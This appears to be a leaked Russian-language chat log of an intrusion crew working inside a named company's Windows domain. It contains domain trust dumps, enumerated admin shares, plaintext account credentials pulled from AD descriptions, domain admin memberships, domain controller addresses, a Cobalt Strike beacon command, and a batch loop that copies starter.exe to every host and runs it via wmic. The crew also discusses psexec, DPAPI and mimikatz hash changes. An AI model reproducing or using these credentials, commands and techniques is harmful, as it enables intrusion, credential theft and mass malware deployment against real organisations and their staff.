trustdmp.txt:31: dn:CN=Wilsonart.com,CN=System,DC=cn,DC=Wilsonart,DC=com
trustdmp.txt:49: dn:CN=Wilsonart.com,CN=System,DC=ralphwilson,DC=com
trustdmp.txt:67: dn:CN=Wilsonart.com,CN=System,DC=uk,DC=Wilsonart,DC=com
trustdmp.txt:85: dn:CN=Wilsonart.com,CN=System,DC=polyrey,DC=com
trustdmp.txt:112: dn:CN=Wilsonart.com,CN=System,DC=resopal,DC=ger
trustdmp.txt:130: dn:CN=Wilsonart.com,CN=System,DC=arborite,DC=com
trustdmp.txt:148: dn:CN=Wilsonart.com,CN=System,DC=eu,DC=Wilsonart,DC=com
Found 7 matches for "CN=Wilsonart.com".

``обрати вниманиеон не повторяетсянет пока увыне сбрутились случайно?как там с ними кстати обстоит вопрос?+ с текущего керб естьотуда снял ад_инфо и кербывсего 7 трастов получилосьу них текущий домен в трастах повторяется много разтам все трастывыше лежит архиви для каждой групы выберем единую точку деплоятаким образом мы "сгрупируем" трасты между собойчто и требуется проверитьвероятнее всего они между собой законтачены на полную видимостьобратите внимание на подобные записи
dn:CN=slf.local,CN=System,DC=Wilsonart,DC=com
dn:CN=slf.local,CN=System,DC=uk,DC=Wilsonart,DC=com28 трастов это просто плохая организация сети и не более, пугаться не стоити будем выбирать соответствующие точки откуда пойдет раскидкагоспода, снимайте составы всех доменовuser4`hyperion_service`
```
\\78186W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\78186W7P.Wilsonart.com\C$ - Default share
\\78186W7P.Wilsonart.com\IPC$ - Remote IPC
\\ED79161W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\ED79161W10P.Wilsonart.com\C$ - Default share
\\ED79161W10P.Wilsonart.com\IPC$ - Remote IPC
\\79337W10P64.Wilsonart.com\ADMIN$ - Remote Admin
\\79337W10P64.Wilsonart.com\C$ - Default share
\\79337W10P64.Wilsonart.com\IPC$ - Remote IPC
\\78192W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\78192W7P.Wilsonart.com\C$ - Default share
\\78192W7P.Wilsonart.com\IPC$ - Remote IPC
\\78204W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\78204W7P.Wilsonart.com\C$ - Default share
\\78204W7P.Wilsonart.com\IPC$ - Remote IPC
\\79220W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\79220W10P.Wilsonart.com\C$ - Default share
\\79220W10P.Wilsonart.com\IPC$ - Remote IPC
\\73932W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\73932W7P.Wilsonart.com\C$ - Default share
\\73932W7P.Wilsonart.com\IPC$ - Remote IPC
\\76869W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\76869W7P.Wilsonart.com\C$ - Default share
\\76869W7P.Wilsonart.com\IPC$ - Remote IPC
\\DCWAS25.Wilsonart.com\ADMIN$ - Remote Admin
\\DCWAS25.Wilsonart.com\C$ - Default share
\\DCWAS25.Wilsonart.com\F$ - Default share
\\DCWAS25.Wilsonart.com\IPC$ - Remote IPC
\\DEVBIOBI.Wilsonart.com\ADMIN$ - Remote Admin
\\DEVBIOBI.Wilsonart.com\Backups -
\\DEVBIOBI.Wilsonart.com\BackupScripts -
\\DEVBIOBI.Wilsonart.com\BIAPPSProjects -
\\DEVBIOBI.Wilsonart.com\C$ - Default share
\\DEVBIOBI.Wilsonart.com\D$ - Default share
\\DEVBIOBI.Wilsonart.com\IPC$ - Remote IPC
\\DEVBIOBI.Wilsonart.com\OBIEE -
\\DEVBIOBI.Wilsonart.com\temp -
\\EL79470W10P64.Wilsonart.com\ADMIN$ - Remote Admin
\\EL79470W10P64.Wilsonart.com\C$ - Default share
\\EL79470W10P64.Wilsonart.com\IPC$ - Remote IPC
\\79196W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\79196W10P.Wilsonart.com\C$ - Default share
\\79196W10P.Wilsonart.com\IPC$ - Remote IPC
\\74617W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\74617W7P.Wilsonart.com\C$ - Default share
\\74617W7P.Wilsonart.com\D$ - Default share
\\74617W7P.Wilsonart.com\IPC$ - Remote IPC
\\EL80143W10P64.Wilsonart.com\ADMIN$ - Remote Admin
\\EL80143W10P64.Wilsonart.com\C$ - Default share
\\EL80143W10P64.Wilsonart.com\IPC$ - Remote IPC
\\78486W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\78486W10P.Wilsonart.com\C$ - Default share
\\78486W10P.Wilsonart.com\IPC$ - Remote IPC
\\74496W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\74496W7P.Wilsonart.com\B$ - Default share
\\74496W7P.Wilsonart.com\C$ - Default share
\\74496W7P.Wilsonart.com\E$ - Default share
\\74496W7P.Wilsonart.com\IPC$ - Remote IPC
\\79855W10P64.Wilsonart.com\ADMIN$ - Remote Admin
\\79855W10P64.Wilsonart.com\C$ - Default share
\\79855W10P64.Wilsonart.com\IPC$ - Remote IPC
\\DCWAS84.Wilsonart.com\ADMIN$ - Remote Admin
\\DCWAS84.Wilsonart.com\C$ - Default share
\\DCWAS84.Wilsonart.com\IPC$ - Remote IPC
\\DCWAS84.Wilsonart.com\Test -
\\VyomLabs4.Wilsonart.com\ADMIN$ - Remote Admin
\\VyomLabs4.Wilsonart.com\C$ - Default share
\\VyomLabs4.Wilsonart.com\IPC$ - Remote IPC
\\HQTAS73.Wilsonart.com\ADMIN$ - Remote Admin
\\HQTAS73.Wilsonart.com\C$ - Default share
\\HQTAS73.Wilsonart.com\D$ - Default share
\\HQTAS73.Wilsonart.com\F9Data -
\\HQTAS73.Wilsonart.com\infor -
\\HQTAS73.Wilsonart.com\IPC$ - Remote IPC
\\HQTAS73.Wilsonart.com\tempinstall -
\\HQTAS73.Wilsonart.com\test -
\\79127W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\79127W10P.Wilsonart.com\C$ - Default share
\\79127W10P.Wilsonart.com\IPC$ - Remote IPC
\\78722W7P64.Wilsonart.com\ADMIN$ - Remote Admin
\\78722W7P64.Wilsonart.com\C$ - Default share
\\78722W7P64.Wilsonart.com\IPC$ - Remote IPC
\\73339W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\73339W7P.Wilsonart.com\C$ - Default share
\\73339W7P.Wilsonart.com\IPC$ - Remote IPC
\\74211W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\74211W7P.Wilsonart.com\B$ - Default share
\\74211W7P.Wilsonart.com\C$ - Default share
\\74211W7P.Wilsonart.com\IPC$ - Remote IPC
\\78229W7E64.Wilsonart.com\ADMIN$ - Remote Admin
\\78229W7E64.Wilsonart.com\C$ - Default share
\\78229W7E64.Wilsonart.com\IPC$ - Remote IPC
\\77831W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\77831W7P.Wilsonart.com\C$ - Default share
\\77831W7P.Wilsonart.com\IPC$ - Remote IPC
\\73368W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\73368W7P.Wilsonart.com\C$ - Default share
\\73368W7P.Wilsonart.com\E$ - Default share
\\73368W7P.Wilsonart.com\IPC$ - Remote IPC
\\TNTAS08.Wilsonart.com\ADMIN$ - Remote Admin
\\TNTAS08.Wilsonart.com\C$ - Default share
\\TNTAS08.Wilsonart.com\Extract -
\\TNTAS08.Wilsonart.com\HP Officejet Pro K550 Series
\\TNTAS08.Wilsonart.com\IPC$ - Remote IPC
\\TNTAS08.Wilsonart.com\print$ - Printer Drivers
\\TNTAS08.Wilsonart.com\Ricoh Aficio MP C2500 PCL6
\\TNTAS08.Wilsonart.com\Users -
\\ED79126W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\ED79126W10P.Wilsonart.com\C$ - Default share
\\ED79126W10P.Wilsonart.com\IPC$ - Remote IPC
\\73747W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\73747W7P.Wilsonart.com\C$ - Default share
\\73747W7P.Wilsonart.com\IPC$ - Remote IPC
\\73747W7P.Wilsonart.com\print$ - Printer Drivers
\\DRWAS07.Wilsonart.com\ADMIN$ - Remote Admin
\\DRWAS07.Wilsonart.com\C$ - Default share
\\DRWAS07.Wilsonart.com\IPC$ - Remote IPC
\\DCWAS39.Wilsonart.com\ADMIN$ - Remote Admin
\\DCWAS39.Wilsonart.com\C$ - Default share
\\DCWAS39.Wilsonart.com\D$ - Default share
\\DCWAS39.Wilsonart.com\IPC$ - Remote IPC
\\74172W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\74172W7P.Wilsonart.com\B$ - Default share
\\74172W7P.Wilsonart.com\C$ - Default share
\\74172W7P.Wilsonart.com\IPC$ - Remote IPC
\\QABIWEB.Wilsonart.com\ADMIN$ - Remote Admin
\\QABIWEB.Wilsonart.com\C$ - Default share
\\QABIWEB.Wilsonart.com\D$ - Default share
\\QABIWEB.Wilsonart.com\IPC$ - Remote IPC
\\QABIWEB.Wilsonart.com\Software -
\\EL76306W7E.Wilsonart.com\ADMIN$ - Remote Admin
\\EL76306W7E.Wilsonart.com\C$ - Default share
\\EL76306W7E.Wilsonart.com\IPC$ - Remote IPC
\\79146W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\79146W10P.Wilsonart.com\C$ - Default share
\\79146W10P.Wilsonart.com\IPC$ - Remote IPC
\\DCWAS98.Wilsonart.com\ADMIN$ - Remote Admin
\\DCWAS98.Wilsonart.com\C$ - Default share
\\DCWAS98.Wilsonart.com\IPC$ - Remote IPC
\\QABIPLN.Wilsonart.com\ADMIN$ - Remote Admin
\\QABIPLN.Wilsonart.com\C$ - Default share
\\QABIPLN.Wilsonart.com\D$ - Default share
\\QABIPLN.Wilsonart.com\IPC$ - Remote IPC
\\QABIPLN.Wilsonart.com\Software -
\\77374W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\77374W7P.Wilsonart.com\C$ - Default share
\\77374W7P.Wilsonart.com\IPC$ - Remote IPC
\\74081W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\74081W7P.Wilsonart.com\C$ - Default share
\\74081W7P.Wilsonart.com\IPC$ - Remote IPC
\\74081W7P.Wilsonart.com\print$ - Printer Drivers
\\74081W7P.Wilsonart.com\RICOH MP 2554 PCL 6
\\DT03W7P64.Wilsonart.com\ADMIN$ - Remote Admin
\\DT03W7P64.Wilsonart.com\C$ - Default share
\\DT03W7P64.Wilsonart.com\IPC$ - Remote IPC
\\73313W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\73313W7P.Wilsonart.com\B$ - Default share
\\73313W7P.Wilsonart.com\C$ - Default share
\\73313W7P.Wilsonart.com\IPC$ - Remote IPC
\\78172W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\78172W10P.Wilsonart.com\C$ - Default share
\\78172W10P.Wilsonart.com\IPC$ - Remote IPC
\\HeathDesktop.Wilsonart.com\ADMIN$ - Remote Admin
\\HeathDesktop.Wilsonart.com\C$ - Default share
\\HeathDesktop.Wilsonart.com\IPC$ - Remote IPC
\\EL79448W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\EL79448W10P.Wilsonart.com\C$ - Default share
\\EL79448W10P.Wilsonart.com\IPC$ - Remote IPC
\\77953W7E32.Wilsonart.com\ADMIN$ - Remote Admin
\\77953W7E32.Wilsonart.com\C$ - Default share
\\77953W7E32.Wilsonart.com\IPC$ - Remote IPC
\\75516W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\75516W7P.Wilsonart.com\C$ - Default share
\\75516W7P.Wilsonart.com\IPC$ - Remote IPC
\\77956W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\77956W7P.Wilsonart.com\C$ - Default share
\\77956W7P.Wilsonart.com\IPC$ - Remote IPC
\\QABIESS.Wilsonart.com\ADMIN$ - Remote Admin
\\QABIESS.Wilsonart.com\C$ - Default share
\\QABIESS.Wilsonart.com\D$ - Default share
\\QABIESS.Wilsonart.com\data -
\\QABIESS.Wilsonart.com\IPC$ - Remote IPC
\\77830W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\77830W7P.Wilsonart.com\C$ - Default share
\\77830W7P.Wilsonart.com\IPC$ - Remote IPC
\\77830W7P.Wilsonart.com\print$ - Printer Drivers
\\77830W7P.Wilsonart.com\test zebra printer
\\DCWAS03.Wilsonart.com\ADMIN$ - Remote Admin
\\DCWAS03.Wilsonart.com\C$ - Default share
\\DCWAS03.Wilsonart.com\D$ - Default share
\\DCWAS03.Wilsonart.com\E$ - Default share
\\DCWAS03.Wilsonart.com\IPC$ - Remote IPC
\\DCWAS03.Wilsonart.com\NxT$ -
\\DCWAS03.Wilsonart.com\NxTDeve$ -
\\DCWAS03.Wilsonart.com\NxTPyqa$ -
\\DCWAS03.Wilsonart.com\NxTTest$ -
\\73346W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\73346W7P.Wilsonart.com\C$ - Default share
\\73346W7P.Wilsonart.com\IPC$ - Remote IPC
\\EL79469W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\EL79469W10P.Wilsonart.com\C$ - Default share
\\EL79469W10P.Wilsonart.com\IPC$ - Remote IPC
\\74494W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\74494W7P.Wilsonart.com\B$ - Default share
\\74494W7P.Wilsonart.com\C$ - Default share
\\74494W7P.Wilsonart.com\IPC$ - Remote IPC
\\78070W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\78070W7P.Wilsonart.com\C$ - Default share
\\78070W7P.Wilsonart.com\IPC$ - Remote IPC
\\74205W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\74205W7P.Wilsonart.com\B$ - Default share
\\74205W7P.Wilsonart.com\C$ - Default share
\\74205W7P.Wilsonart.com\IPC$ - Remote IPC
\\74015W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\74015W7P.Wilsonart.com\C$ - Default share
\\74015W7P.Wilsonart.com\IPC$ - Remote IPC
\\74015W7P.Wilsonart.com\print$ - Printer Drivers
\\77195W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\77195W7P.Wilsonart.com\C$ - Default share
\\77195W7P.Wilsonart.com\IPC$ - Remote IPC
\\78210W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\78210W7P.Wilsonart.com\C$ - Default share
\\78210W7P.Wilsonart.com\IPC$ - Remote IPC
\\76801W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\76801W7P.Wilsonart.com\C$ - Default share
\\76801W7P.Wilsonart.com\IPC$ - Remote IPC
\\79151W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\79151W10P.Wilsonart.com\C$ - Default share
\\79151W10P.Wilsonart.com\IPC$ - Remote IPC
\\ITWDS02.Wilsonart.com\ADMIN$ - Remote Admin
\\ITWDS02.Wilsonart.com\C$ - Default share
\\ITWDS02.Wilsonart.com\D$ - Default share
\\ITWDS02.Wilsonart.com\DeploymentShare$ -
\\ITWDS02.Wilsonart.com\IPC$ - Remote IPC
\\ITWDS02.Wilsonart.com\REMINST - Windows Deployment Services Share
\\ITWDS02.Wilsonart.com\Users -
\\79904W10P64.Wilsonart.com\ADMIN$ - Remote Admin
\\79904W10P64.Wilsonart.com\C$ - Default share
\\79904W10P64.Wilsonart.com\IPC$ - Remote IPC
\\74181W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\74181W7P.Wilsonart.com\C$ - Default share
\\74181W7P.Wilsonart.com\D$ - Default share
\\74181W7P.Wilsonart.com\IPC$ - Remote IPC
\\74181W7P.Wilsonart.com\X$ - Default share
\\79192W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\79192W10P.Wilsonart.com\C$ - Default share
\\79192W10P.Wilsonart.com\IPC$ - Remote IPC
\\77403W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\77403W10P.Wilsonart.com\C$ - Default share
\\77403W10P.Wilsonart.com\IPC$ - Remote IPC
\\78715W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\78715W10P.Wilsonart.com\C$ - Default share
\\78715W10P.Wilsonart.com\IPC$ - Remote IPC
\\78715W10P.Wilsonart.com\print$ - Printer Drivers
\\78715W10P.Wilsonart.com\RICOH MP C3503
\\UKWAS01.Wilsonart.com\ADMIN$ - Remote Admin
\\UKWAS01.Wilsonart.com\C$ - Default share
\\UKWAS01.Wilsonart.com\IPC$ - Remote IPC
\\UKWAS01.Wilsonart.com\NETLOGON - Logon server share
\\UKWAS01.Wilsonart.com\SYSVOL - Logon server share
\\UKWAS01.Wilsonart.com\test -
\\L79009W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\L79009W10P.Wilsonart.com\C$ - Default share
\\L79009W10P.Wilsonart.com\IPC$ - Remote IPC
\\73689W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\73689W7P.Wilsonart.com\C$ - Default share
\\73689W7P.Wilsonart.com\IPC$ - Remote IPC
\\73923W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\73923W7P.Wilsonart.com\C$ - Default share
\\73923W7P.Wilsonart.com\IPC$ - Remote IPC
\\79214W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\79214W10P.Wilsonart.com\C$ - Default share
\\79214W10P.Wilsonart.com\IPC$ - Remote IPC
\\DCVEEAM02.Wilsonart.com\ADMIN$ - Remote Admin
\\DCVEEAM02.Wilsonart.com\C$ - Default share
\\DCVEEAM02.Wilsonart.com\E$ - Default share
\\DCVEEAM02.Wilsonart.com\F$ - Default share
\\DCVEEAM02.Wilsonart.com\G$ - Default share
\\DCVEEAM02.Wilsonart.com\H$ - Default share
\\DCVEEAM02.Wilsonart.com\I$ - Default share
\\DCVEEAM02.Wilsonart.com\IPC$ - Remote IPC
\\DCVEEAM02.Wilsonart.com\J$ - Default share
\\DCVEEAM02.Wilsonart.com\K$ - Default share
\\DCVEEAM02.Wilsonart.com\L$ - Default share
\\DCVEEAM02.Wilsonart.com\M$ - Default share
\\DCVEEAM02.Wilsonart.com\N$ - Default share
\\DCVEEAM02.Wilsonart.com\O$ - Default share
\\DCVEEAM02.Wilsonart.com\P$ - Default share
\\ED79160W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\ED79160W10P.Wilsonart.com\C$ - Default share
\\ED79160W10P.Wilsonart.com\IPC$ - Remote IPC
\\76406W7E64.Wilsonart.com\ADMIN$ - Remote Admin
\\76406W7E64.Wilsonart.com\C$ - Default share
\\76406W7E64.Wilsonart.com\IPC$ - Remote IPC
\\73860W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\73860W7P.Wilsonart.com\C$ - Default share
\\73860W7P.Wilsonart.com\IPC$ - Remote IPC
\\dcwas88.Wilsonart.com\ADMIN$ - Remote Admin
\\dcwas88.Wilsonart.com\C$ - Default share
\\dcwas88.Wilsonart.com\D$ - Default share
\\dcwas88.Wilsonart.com\E$ - Default share
\\dcwas88.Wilsonart.com\IPC$ - Remote IPC
\\dcwas88.Wilsonart.com\print$ - Printer Drivers
\\ES79799W10P64.Wilsonart.com\ADMIN$ - Remote Admin
\\ES79799W10P64.Wilsonart.com\C$ - Default share
\\ES79799W10P64.Wilsonart.com\IPC$ - Remote IPC
\\78179W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\78179W7P.Wilsonart.com\C$ - Default share
\\78179W7P.Wilsonart.com\IPC$ - Remote IPC
\\75537W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\75537W7P.Wilsonart.com\C -
\\75537W7P.Wilsonart.com\C$ - Default share
\\75537W7P.Wilsonart.com\HP LJ300-400 color M351-M451 PCL 6 (Copy 1)
\\75537W7P.Wilsonart.com\IPC$ - Remote IPC
\\75537W7P.Wilsonart.com\print$ - Printer Drivers
\\76032W10E.Wilsonart.com\ADMIN$ - Remote Admin
\\76032W10E.Wilsonart.com\C$ - Default share
\\76032W10E.Wilsonart.com\D$ - Default share
\\76032W10E.Wilsonart.com\Downloads -
\\76032W10E.Wilsonart.com\E$ - Default share
\\76032W10E.Wilsonart.com\F$ - Default share
\\76032W10E.Wilsonart.com\IPC$ - Remote IPC
\\76032W10E.Wilsonart.com\ISOs -
\\76032W10E.Wilsonart.com\print$ - Printer Drivers
\\76032W10E.Wilsonart.com\Users -
\\76032W10E.Wilsonart.com\VMShare -
\\75574W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\75574W7P.Wilsonart.com\C$ - Default share
\\75574W7P.Wilsonart.com\IPC$ - Remote IPC
\\QABIHFM.Wilsonart.com\ADMIN$ - Remote Admin
\\QABIHFM.Wilsonart.com\C$ - Default share
\\QABIHFM.Wilsonart.com\D$ - Default share
\\QABIHFM.Wilsonart.com\data -
\\QABIHFM.Wilsonart.com\FDMEE -
\\QABIHFM.Wilsonart.com\IPC$ - Remote IPC
\\QABIHFM.Wilsonart.com\ODI_Migrations -
\\DCWAS09.Wilsonart.com\ADMIN$ - Remote Admin
\\DCWAS09.Wilsonart.com\C$ - Default share
\\DCWAS09.Wilsonart.com\F$ - Default share
\\DCWAS09.Wilsonart.com\IPC$ - Remote IPC
\\DCWAS09.Wilsonart.com\print$ - Printer Drivers
\\DCWAS09.Wilsonart.com\RicohSecurePrint - Ricoh Secure Print
\\EL77610W10E.Wilsonart.com\ADMIN$ - Remote Admin
\\EL77610W10E.Wilsonart.com\C$ - Default share
\\EL77610W10E.Wilsonart.com\IPC$ - Remote IPC
\\PRDBITAB.Wilsonart.com\ADMIN$ - Remote Admin
\\PRDBITAB.Wilsonart.com\Backups -
\\PRDBITAB.Wilsonart.com\C$ - Default share
\\PRDBITAB.Wilsonart.com\D$ - Default share
\\PRDBITAB.Wilsonart.com\Essbase_Extract_for_Tableau -
\\PRDBITAB.Wilsonart.com\IPC$ - Remote IPC
\\78220W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\78220W7P.Wilsonart.com\C$ - Default share
\\78220W7P.Wilsonart.com\IPC$ - Remote IPC
\\EL80150W10P64.Wilsonart.com\ADMIN$ - Remote Admin
\\EL80150W10P64.Wilsonart.com\C$ - Default share
\\EL80150W10P64.Wilsonart.com\IPC$ - Remote IPC
\\EL80150W10P64.Wilsonart.com\print$ - Printer Drivers
\\LWDA-DC.Wilsonart.com\Accounting -
\\LWDA-DC.Wilsonart.com\ADMIN$ - Remote Admin
\\LWDA-DC.Wilsonart.com\C$ - Default share
\\LWDA-DC.Wilsonart.com\CADCode -
\\LWDA-DC.Wilsonart.com\D$ - Default share
\\LWDA-DC.Wilsonart.com\DallasFiles -
\\LWDA-DC.Wilsonart.com\DallasManagerFiles -
\\LWDA-DC.Wilsonart.com\E$ - Default share
\\LWDA-DC.Wilsonart.com\IPC$ - Remote IPC
\\LWDA-DC.Wilsonart.com\morbi -
\\LWDA-DC.Wilsonart.com\Scans -
\\LWDA-DC.Wilsonart.com\Schedule -
\\78167W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\78167W7P.Wilsonart.com\C$ - Default share
\\78167W7P.Wilsonart.com\IPC$ - Remote IPC
\\78167W7P.Wilsonart.com\print$ - Printer Drivers
\\78167W7P.Wilsonart.com\Ricoh M2554
\\DT01W7P64.Wilsonart.com\ADMIN$ - Remote Admin
\\DT01W7P64.Wilsonart.com\C$ - Default share
\\DT01W7P64.Wilsonart.com\IPC$ - Remote IPC
\\78735W10E64.Wilsonart.com\ADMIN$ - Remote Admin
\\78735W10E64.Wilsonart.com\C$ - Default share
\\78735W10E64.Wilsonart.com\IPC$ - Remote IPC
\\80109W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\80109W10P.Wilsonart.com\C$ - Default share
\\80109W10P.Wilsonart.com\IPC$ - Remote IPC
\\78140W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\78140W7P.Wilsonart.com\C$ - Default share
\\78140W7P.Wilsonart.com\IPC$ - Remote IPC
``шарынетвышли с точки входа?нет ещенашли ДА?``
 DCWAS39.Wilsonart.com
 DCWAS48.Wilsonart.com
 DEVBIOBI.Wilsonart.com
 DEVBIESS.Wilsonart.com
 DEVBIHFM.Wilsonart.com
 DEVBIPLN.Wilsonart.com
 DEVBIWEB.Wilsonart.com
 QABIESS.Wilsonart.com
 QABIHFM.Wilsonart.com
 QABIOBI.Wilsonart.com
 QABITAB.Wilsonart.com
 QABIWEB.Wilsonart.com~
``FAMIXXPuser9>wilsonart\rockwell
>VantgagePoint
```
beacon> shell net use * \\DCWAS08.wilsonart.com\C$ VantgagePoint /user:wilsonart\rockwell
[Tasked beacon to run: net use * \\DCWAS08.wilsonart.com\C$ VantgagePoint /user:wilsonart\rockwell
[+] host called home, sent: 106 bytes
[+] received output:
System error 86 has occurred.

The specified network password is not correct.
``````
wilsonart\REPORT_BUILDER
rbuilder
```
```
wilsonart\adhesives
pword
```
```
wilsonart\flrcallctr
pword
```
```
wilsonart\flas21
flas21a
```
```
wilsonart\hyperion_Service
waglobal2014
```
```
wilsonart\trackitsql
trackit114
```
```
wilsonart\rockwell
VantgagePoint
``продублирую``
>description: password rbuilder
>description: Generic GroupWise account for Adhesives.  Password - pword
>description: Password is pword.
>description: Pword-flas21a. Deco 1
>description: The password is waglobal2014 Password does not expire
>description: For Trackit SQL passqord is trackit114
>description: Service account for DCWAS08 Execel Password is VantgagePoint
``````
====== AntiVirus ======

  Engine : Symantec Endpoint Protection
  ProductEXE : C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\14.2.5569.2100.105\Bin\WSCSavNotifier.exe
  ReportingEXE : C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\14.2.5569.2100.105\Bin64\sepWscSvc64.exe
``````
Domain Controllers:
 Server Name IP Address
 ----------- ----------
 DCWAS01 170.7.2.220
 TNWAS01 170.7.14.203
 FLWAS01 170.7.20.220
 UKWAS01 170.7.70.210
 FRWAS02 172.25.168.125
 DRWAS01 170.7.132.51
``дк``
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
adm-cavailj adm-GrelleS Administrator
alexanm bmccm fowlerh
lucase moorer2 owensd
petersm2 polyreyadmin roeders
solarwindsarm.svc vyombmccm
```
 
```
Group name Enterprise Admins
Comment Designated administrators of the enterprise
Members
-------------------------------------------------------------------------------
adm-cavailj adm-GrelleS Administrator
fowlerh lucase petersm2
polyreyadmin roeders
```
 
```
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
cdwsetup
whsetup
WILSONART\Domain Admins
```а где списки еа дк ла даа проверить 1 на ад юзерспонялтипо не запускать батник с 6 командамипроверять по одной командено я тебе советуючтобы навернякада снимай всеа вроде и снялосьвроде карантина то получится как в прошлой сеткевообще не трогать или попытаться снять?+ карантиныон там 7 раз сам себе доверяетну их тут во много меньшеи кербы тожевот)траст он на то и траст (в зависимости от связей между ними)врубиляокейатрасты снимаются и без админ правпоэтому без ебли мозговкак и ятут внутри сети то некем ходить ещёладно понимаю что ты заебалсяв трастыостальное увидим в процесетеоритически да, при условии что у тебя вмик работает domain wideостаётся креды вставитьну всё получаетсявозможныевызов пайпнутых команд в батнике стабильно лучше отрабатывает если прописать креды
минимизирует багитак под токеном неплюс я бы добавил ДА креды к запуску вмика на всякий случайпоменяй на cmd /cясно, понял, убери runнежезапуститчто такое вообще "run"?run зачем?)и подправил неверноя там подправилокC:\starter.exeи кстати, лучше копировать прямо в кореньpsexec_command
wmicexec_command (не помню точное название мсф модуля - но какое-то такое)
они оба даже хеши принимают если клиров не будет под рукойлюбым способома потом запустить ихможно раскидать просто "первой частью" батника файлыможно и псекзекомно можно вмиком от ДА
это "поедет "проще
вмик правда не запустит от системыа штаск обязательно ?вмиком этот экзешник запустить не проще будет?вторая часть где сштаск - ужаснапервая часть окв файлаху меня он был откуда-тону окейнет.не?он типа прямо на mdsn естьтак это же ты писалты хотя бы синтаксис schtasks читал ?какая-то чушь вообщенет не будет само собойжить будет?``
for /F %%i in (C:\ProgramData\hostlist.txt) do @ copy C:\ProgramData\starter.exe \\%i\C$\Windows\System32\starter.exe && wmic /node:%%i /user: /password: process call create "cmd /c C:\Windows\System32\starter.exe" && ping %%i -n 3 >> .\ping.txt
``@tl2 добавь меня в fusionfirst.localсоздай беседу плз -fusionfirst.local+slypad полетелаКидай, нам всеравно ждать пока рабочий день закончится в техасеslypad.com:443++надо кому-нибудь свежую сеточку пустую?вывод можно в csv поменять, чтобы было удобнейспоконого времени суток)до завтраконечно, отдыхайтеможет на сегодня все?
а то мы уже засыпаем, голова не работает...и вцелом то что я имел ввиду про "чувствительную" сеть - скорее имел ввиду серьезный мониторинг ивентов, там где вся сеть покрыта ЕДР агентами, системами мониторинга и прочими злыднямину и опять же... хак штука "не статичная", что-то откроетсякоторый слабо отличается от реального ада Азур облачки как раз предоставляют прямо из коробки свой Azure-ADмайкрософт движется в направлении внедрения своих облаков в первую очередьесли вести речь о "немаленькой" сеткепри таких настройкахе нельзя админить грубо говорятакая сеть просто не будет работать@user1 то что ты описал невохможно на практикесдайся враг, замри и лягмы пока немного очень работаем с "чувствительными" сетями - но когда до таких дойдет дело... вобщем вы уже и сами понимаете что "все сломать" можно даже с впна. и иногда это единственный метод...будет много случаев когда это потребуетсяв том что можно использовать вне контекста конкретных пользователей манипулируя даже удаленно файловой системой и доменомогромный плюснужно раскурить самому, тут гайды неуместны слегка такие "прямые" потому что один из ключевых механизмов хранения кредвообще
суть DPAPI атакэтот вопрос надо задать себе))))риторический вопрос:grin:хуйли я всю ночь этот мастеркей доставал и ничего в итоге не получилеще какие-то вопросы, накидывайтевсех в sprouselawдобавлю)скажите кого куда добавитьпожалуй пора всех нас в эту конфу добавитьтак нас туда никто не довабил чет@user7 если это относится к какой-то сетке - кидай пожалуйста в соответствующую конфуenjoyhttps://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM/мимикатц это умеетагаобратно на известный?не, пароль ладно. а как хэш поменять?по-разному можно
повершеллом
можно просто через кмддаж не знаю куда подробнее))
поменять
пользователю
пароль)
лол
